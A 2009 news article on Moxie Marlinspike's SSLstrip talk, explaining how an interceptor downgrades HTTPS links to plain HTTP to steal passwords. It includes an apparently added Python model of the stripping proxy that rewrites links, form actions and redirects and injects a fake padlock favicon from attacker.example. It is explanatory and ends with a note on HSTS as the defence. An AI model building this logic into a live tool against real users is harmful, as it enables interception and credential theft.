
SSLstrip hacking tool bypasses SSL to trick users, steal passwords

By Neil Roiter, Senior Technology Editor, Information Security magazine
18 Feb 2009 | SearchSecurity.com


ARLINGTON, Va. -- How do you exploit Hypertext Transfer Protocol Secure (HTTPS), tightly wrapped in SSL or TLS?

According to Moxie Marlinspike, you don't. You exploit the HTTP it's built on. If you think about it, he told a Black Hat DC Briefings audience Wednesday, people encounter SSL by clicking on a link and being redirected to an HTTPS-secured page when they log into banking, webmail or shopping websites.

Marlinspike unveiled a hacking technique that intercepts Web traffic and tricks users into giving up passwords and other sensitive information. With the aid of a new tool called SSLstrip, Marlinspike demonstrated how easy it is to make users believe they are on a trusted, SSL-secured website when they are in fact talking to the attacker over plain HTTP.

"People only encounter HTTPS via HTTP, so maybe we can think about starting by attacking HTTP," he said. "Normally, if we're doing man-in-the-middle attacks against SSL, we go straight for SSL, straight after that connection. But if SSL depends on this other protocol, why don't we look at that first?"

The trick, said Marlinspike, is duplicating a Web environment in which people are comfortable, in which they feel safe. Not long ago, he said, websites relied on what he called positive feedback: you see the ubiquitous padlock icon, and perhaps the address bar turns a reassuring color.

But now, newer browsers like Firefox 3 and IE8 display dire, in-your-face warnings that only the most reckless Web surfer would ignore. So, if you're trying to trick people into entering their credit card numbers into Web pages they think are secured by SSL, but that you actually control, you want them to see a page that looks almost, if not completely, normal. Positive feedback is pretty subtle; its absence is easy to miss.

"If we trigger negative feedback, we're totally screwed. People only care if it's a catastrophic problem: 'Look out!'" he said. "If we fail to trigger positive feedback, maybe it's not so bad. People aren't really keeping an eagle eye out for all those positive indicators."

The basic idea is to intercept Web traffic with a new tool called SSLstrip, sitting as a man-in-the-middle between the victim's browser and the Web. The tool rewrites every hyperlink reference (href) and redirect that points to HTTPS so that it points to HTTP instead, and remembers which ones it changed. When the victim follows one of those rewritten links, SSLstrip fetches the real page from the server over HTTPS and hands it back to the victim over plain HTTP. The server thinks everything is secure, because it sees a normal SSL session and is unaware of the exchange between the victim and the attacker's proxy; the victim's browser never attempted an SSL connection, so it has nothing to warn about.

You can even serve the victim your own padlock-style favicon to improve the user's comfort level: the browser shows a lock next to the address, just not the one that means anything.

Once you've got what you want from the victim, SSLstrip can be set to drop out, and the user is once again presented with the genuine SSL-protected page, with the damage already done.
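To make the mechanism concrete, here is a small Python model of the proxy logic described above. It is example code added for this page, not Marlinspike's sslstrip, and does no network I/O: the bank page, the redirect header and the hostnames (bank.example, attacker.example) are constructed placeholders. It shows the three pieces the technique needs: downgrading https:// references in HTML and in Location headers, remembering the downgraded URLs so the proxy itself can fetch them over HTTPS, and swapping in a padlock favicon for positive feedback.

```python
"""Toy model of the SSLstrip technique (added example, not the real tool).

The proxy rewrites https:// references the victim would follow into
http:// ones, records each downgrade, and looks the original back up
when it must fetch the page from the real server over HTTPS.
"""
import re
from typing import Dict, Optional

# Constructed sample of a bank's HTTP landing page; hostnames are placeholders.
SAMPLE_HTML = (
    '<html><head><title>Bank</title></head><body>'
    '<a href="https://bank.example/login">Log in</a> '
    '<form action="HTTPS://bank.example/auth" method="post">'
    '<input name="user"><input name="pass" type="password"></form>'
    '<a href="http://bank.example/about">About</a>'
    '</body></html>'
)
# Constructed response headers for the http -> https redirect users normally see.
SAMPLE_HEADERS = {"Location": "https://bank.example/login", "Server": "x"}

# Hypothetical location of the attacker's padlock-style favicon (assumption).
LOCK_ICON = "http://attacker.example/lock.ico"

# Attributes that carry the links and form targets a user will follow.
_LINK_RE = re.compile(
    r'(?P<prefix>\b(?:href|src|action)\s*=\s*["\'])https://(?P<rest>[^"\']*)',
    re.IGNORECASE,
)
_HEAD_RE = re.compile(r"<head[^>]*>", re.IGNORECASE)


class StripProxy:
    """Sits between the victim (plain HTTP) and the server (real HTTPS)."""

    def __init__(self) -> None:
        # plain-http URL handed to the victim -> https URL the server expects
        self.stripped: Dict[str, str] = {}

    def _downgrade(self, https_url: str) -> str:
        http_url = "http://" + https_url[len("https://"):]
        self.stripped[http_url] = https_url
        return http_url

    def rewrite_html(self, body: str, fake_padlock: bool = False) -> str:
        """Rewrite https:// hrefs, srcs and form actions to http://, recording each."""
        def repl(m: re.Match) -> str:
            return m.group("prefix") + self._downgrade("https://" + m.group("rest"))

        body = _LINK_RE.sub(repl, body)
        if fake_padlock:
            # Inject a lock favicon right after <head> so the tab shows a padlock.
            body = _HEAD_RE.sub(
                lambda m: m.group(0) + f'<link rel="icon" href="{LOCK_ICON}">',
                body, count=1,
            )
        return body

    def rewrite_headers(self, headers: Dict[str, str]) -> Dict[str, str]:
        """Downgrade an https:// Location so the redirect lands on plain HTTP."""
        out = dict(headers)
        loc = out.get("Location")
        if loc and loc.lower().startswith("https://"):
            out["Location"] = self._downgrade(loc)
        return out

    def upstream_url(self, victim_url: str) -> str:
        """URL the proxy itself fetches: HTTPS if this URL was downgraded earlier."""
        return self.stripped.get(victim_url, victim_url)

    def release(self, victim_url: str) -> Optional[str]:
        """'Drop out' after harvesting: stop downgrading this URL, return its https form."""
        return self.stripped.pop(victim_url, None)


if __name__ == "__main__":
    proxy = StripProxy()
    print(proxy.rewrite_headers(SAMPLE_HEADERS))
    print(proxy.rewrite_html(SAMPLE_HTML, fake_padlock=True))
    print(proxy.stripped)
```

The `stripped` map is the heart of it: the victim only ever requests http:// URLs, so the browser has no SSL session to warn about, while `upstream_url` makes the proxy's own connection to the server the one that is encrypted. The caveat for defenders is that nothing on the wire looks wrong from either end; mechanisms that later addressed this, such as HTTP Strict Transport Security (RFC 6797), work by having the browser refuse plain HTTP for a site it has already seen over HTTPS.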

User names and passwords are particularly desirable targets.

"The real nice thing about passwords is that people reuse their passwords. So, if you get their passwords to one site, you've probably got their passwords to 10 or more sites," Marlinspike said.
